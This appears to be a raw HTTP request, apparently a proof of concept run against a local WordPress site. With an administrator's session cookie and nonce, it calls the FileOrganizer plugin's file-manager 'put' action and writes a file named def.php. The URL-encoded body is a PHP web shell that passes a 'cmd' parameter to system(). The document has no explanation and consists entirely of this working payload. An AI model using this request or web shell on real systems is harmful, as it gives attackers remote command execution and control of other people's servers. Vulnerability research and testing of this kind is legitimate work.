POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wordpress/wp-admin/admin.php?page=fileorganizer
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 627
Origin: http://localhost
Connection: keep-alive
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1754892899%7CBFIKF0pp1EvkTNqfMjLpI2J6xhz2HoSTfaGZtfsC8kP%7Cc48923266e58a7fc953016a3630b2c9fb4651250d680419468f60bde8e9e7ec3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1754892899%7CBFIKF0pp1EvkTNqfMjLpI2J6xhz2HoSTfaGZtfsC8kP%7C1823e9770a2cc17b9cddc2d1f65a41422baa0c75dff251cd9845bb88bfeaaca9; wp-settings-time-1=1754720472; PHPSESSID=rvhr2vt7t400reepe578m0ivd5
Priority: u=0

action=fileorganizer_file_folder_manager&fileorganizer_nonce=ff8f492c08&cmd=put&target=l1_ZGVmLnBocA&encoding=UTF-8&content=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform+method%3D%22GET%22+name%3D%22%3C%3Fphp+echo+basename(%24_SERVER%5B'PHP_SELF'%5D)%3B+%3F%3E%22%3E%0A%3Cinput+type%3D%22TEXT%22+name%3D%22cmd%22+autofocus+id%3D%22cmd%22+size%3D%2280%22%3E%0A%3Cinput+type%3D%22SUBMIT%22+value%3D%22Execute%22%3E%0A%3C%2Fform%3E%0A%3Cpre%3E%0A%3C%3Fphp%0A++++if(isset(%24_GET%5B'cmd'%5D))%0A++++%7B%0A++++++++system(%24_GET%5B'cmd'%5D+.+'+2%3E%261')%3B%0A++++%7D%0A%3F%3E%0A%3C%2Fpre%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&reqid=1988d8eefc0188
